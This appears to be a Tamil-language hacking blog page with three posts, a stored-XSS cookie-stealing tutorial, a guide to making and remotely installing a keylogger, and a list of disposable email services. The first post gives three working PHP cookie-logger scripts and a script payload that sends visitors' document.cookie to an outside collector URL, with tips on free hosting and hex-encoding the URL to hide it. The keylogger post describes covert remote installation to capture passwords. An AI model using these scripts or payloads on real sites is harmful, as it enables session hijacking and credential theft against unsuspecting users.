 Stored Attack என்பது Malicious Script களை ஒரு தளத்தின் Command, Guest Book, Reply என ஏதாவது ஒன்றில் Store செய்து அதனை பார்ப்பவர்களின் Browser-ல் அந்த Script - ஐ Run பண்ணுவதாகும்.

எடுத்துக்காட்டாக, Cookie Stealing பற்றி பார்ப்போம்.
ஒரு தளத்தை நீங்கள் Login செய்து பயன்படுத்தும் போது அந்த Login தகவல்கள் Cookie-ல் இருக்கும் என்பதை நாம் அறிந்ததே.

இந்த Cookie -களை படிக்கும் வகையில் Malicious Script- ஐ உருவாக்கி அதனை Store செய்வதன் மூலம் அந்த தளத்திற்கு வருபவர்களின் Cookie -ஐ படிக்க முடியும்.



<?php

$cookie = $_GET['cookie'];

$log = fopen("cookies.txt", "a");

fwrite($log, $cookie ."\n");

fclose($log);

?>



இதனை cookiestaler.php என்று store செய்து அதனை 110mb.com போன்ற ஏதாவது ஒரு இலவச Hosting-ல் பதிவேற்றிக்கொள்ளுங்கள்.

மேலும் சில Cookie Stealer-கள்,



<?php



function GetIP()

{

if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))

$ip = getenv("HTTP_CLIENT_IP");

else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))

$ip = getenv("HTTP_X_FORWARDED_FOR");

else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))

$ip = getenv("REMOTE_ADDR");

else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))

$ip = $_SERVER['REMOTE_ADDR'];

else

$ip = "unknown";

return($ip);

}



function logData()

{

$ipLog="log.txt";

$cookie = $_SERVER['QUERY_STRING'];

$register_globals = (bool) ini_get('register_gobals');

if ($register_globals) $ip = getenv('REMOTE_ADDR');

else $ip = GetIP();



$rem_port = $_SERVER['REMOTE_PORT'];

$user_agent = $_SERVER['HTTP_USER_AGENT'];

$rqst_method = $_SERVER["METHOD"];

$rem_host = $_SERVER['REMOTE_HOST'];

$referer = $_SERVER['HTTP_REFERER'];

$date=date ("l dS of F Y h:i:s A");

$log=fopen("$ipLog", "a+");



if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))

fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");

else

fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");

fclose($log);

}



logData();



?>






<?php

$cookie = $_GET['c'];

$ip = getenv ('REMOTE_ADDR');

$date=date("j F, Y, g:i a");;

$referer=getenv ('HTTP_REFERER');

$fp = fopen('cookies.html', 'a');

fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');

fclose($fp);

header ("Location: http://www.knsankar.blogspot.com");

?>







இது Client Browser-ல் Run ஆகும் போது அதன் cookie Details-ஐ Cookie log.txt -ல் பதிவு செய்யும்.

அதன் Output கீழே உள்ளது போல் இருக்கும்

IP: 10.100.23.14 | PORT: 52020 | HOST: | Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.31318; .NET CLR 3.5.30729) | METHOD: | REF: facebook.com | DATE: Wednesday 22th 2010f June 2011 06:48:06 PM | COOKIE:blahblahblahblah

இந்த Cookie-ஐ XSS Vulnerable தளத்தில் Store செய்ய முடியும். 


எ.கா:






<script>document.location="www.example.com/cookie.php?c=" + document.cookie</script>



மேலதிக தகவல்களுக்கு http://ha.ckers.org/xss.html 





இதில் உங்கள் Cookie URL - ஐ மறைக்க HEX Encoder-ஐ பயன்படுத்தலாம்..




சந்தேகங்கள் எதுவும் இருந்தால் Command-ல் தெரிவிக்கவும்.

Disclaimer:

This Post Only for Educational Purpose.


February 20, 2011

Make your Own Keylogger

                               Keylogger என்பது உங்கள் Keyboard-ல் நீங்கள் டைப் செய்கிற தகவல்களை தனி ஒரு கோப்பாக சேமித்து அதனை குறிப்பிட்ட மின்னஞ்சல் முகவரிக்கு அனுப்புகிற மென்பொருள்.

இதில் இரண்டு வகை உள்ளது. ஒன்று Hardware Keylogger, மற்றொன்று Software Keylogger.

Hardware Keylogger:
                                


                      இவை உங்கள் Keyboard உடன் இணைக்கப்பட்டிருக்கும். இதன் மூலம் உங்கள் தகவல்கள் இந்த கருவியில் பதிவு செய்யப்பட்டுவிடும். அதன் பின்னர் உங்கள் மின்னஞ்சல் முகவரி கடவுச்சொல் களவாடப்படலாம்.


Software Keylogger:

                                                            
                    இந்த பதிவில் நாம் பார்க்கப்போவது software Keylogger. அதன் பெயர் Ardamax Keylogger. இந்த Software- ஐ தேவையான machine -ல் remote installation மூலமாக நிறுவி அதன் தகவல்களை எடுக்க முடியும். இதனை நமது கணிணியில் நிறுவி எப்படி ஒரு Keylogger ஐ தயாரிப்பது என்பதனை கீழே உள்ள வீடியோவில் காட்டப்பட்டுள்ளது.

 



December 14, 2010

தற்காலிக மின்னஞ்சல் சேவைகள்

சில தளங்களை பார்வையிட பதிவு செய்ய வேண்டியிருக்கும். நமது மின்னஞ்சல் முகவரியை தரும்போது அவர்கள் Spam mailகளை அனுப்ப வாய்ப்புள்ளது. பதிவு செய்வதை தவிர்த்து ஏறகனவே பதிவு செய்த login களை Bugmenot.com இணையதளத்தில் எடுத்து பயன்படுத்தினாலும் சில தளங்களில் அவை வேலை செய்வதில்லை. பல தளங்களுக்கு Login இருப்பதில்லை. எனவே Verification Mail களுக்காகவும் spam mail களை தவிர்க்கவும் Disposable Email எனும் தற்காலிக மின்னஞ்சல் முறையை பயன்படுத்தலாம். அதனை இலவசமாக தரும் 6 தளங்களை இப்போது பார்க்கப்போகிறோம்.



1. Mailinator:


                        இந்த தளத்தில் பெறும் மின்னஞ்சல் முகவரிகளை 48 மணி நேரம் வரை உபயோகிக்க முடியும். இதில் உள்ள RSS Feed மூலமாக உங்கள் Reader-லேயே மின்னஞ்சல்களை பெற்றுக்கொள்ளலாம். இந்த மின்னஞ்சல் முகவரியிலிருந்து மின்னஞ்சல் அனுப்பவும் அனுமதிக்கிறார்கள்




                                  இவர்கள் தரும் மின்னஞ்சல் முகவரியை 3 மணி நேரம் வரை உபயோகிக்கலாம். மற்ற வசதிகள் mailinator போலவே இருந்தாலும், இதில் நமக்கு பிடித்த முகவரியை வைத்துக்கொள்ள முடியாது  இவர்கள் தருகின்ற wmn09pssbah52lp@h.mintemail.com போன்ற மின்னஞ்சல் முகவரியைத்தான் பயன்படுத்த வேண்டும். :P



                             7 நாட்கள் வரை இவர்களிடம் பெறும் மின்னஞ்சல் முகவரியை உபயோகிக்கலாம். இவர்கள் தரும் inbox, Password Protected. (மற்றவைகளில் இது கிடையாது). மேலும் RSS Feed வசதியும் உள்ளது. 10$ கட்டினால் Premium Account ம் தருகிறார்கள்.


                                      இதன் மின்னஞ்சல் முகவரியை 1 மணி நேரம் மட்டுமே பயன்படுத்த முடியும். இதில் yourname@guerrillamailblock.com என மின்னஞ்சல் முகவரி உருவாக்கிக்கொள்ள முடியும். இவர்களும் Premium Account வசதி வைத்துள்ளனர்.



                                    இதில் RSS Feed வசதி உள்ளது. மேலும் மின்னஞ்சல்களை Forward செய்ய முடியும். மேலும் SSL உபயோகிப்பதால் secure சேவை தருகிறார்கள். இவர்கள் தரும் inbox 4 MB அளவுடையது. இதில் உங்கள் முகவரியை மட்டும் வைத்து வேறு ஒருவர் உங்கள் மின்னஞ்சல்களை பார்க்க முடியும். எனவே complex ஆக முகவரிகளை அமைத்துக்கொள்வது நல்லது. (like knsankar1988chennai@mailmetrash.com)


                                                                     இதில் yourname@onewaymail.com என மின்னஞ்சல் முகவரியை அமைத்துக்கொள்ளலாம். இதிலும் உங்கள் முகவரியை மட்டும் வைத்து வேறு ஒருவர் உங்கள் மின்னஞ்சல்களை பார்க்க முடியும். எனவே படித்த மின்னஞ்சல்களை உடனே அழிப்பது நல்லது. அல்லது Complex Username வைத்துக்கொள்ள வேண்டும். இதன் inbox 3 நாட்கள் வரை உபயோகத்தில் இருக்கும்.

 உங்கள் கருத்துக்களை பின்னூட்டம் இடுங்கள். அடுத்த பதிவில் சந்திப்போம் :)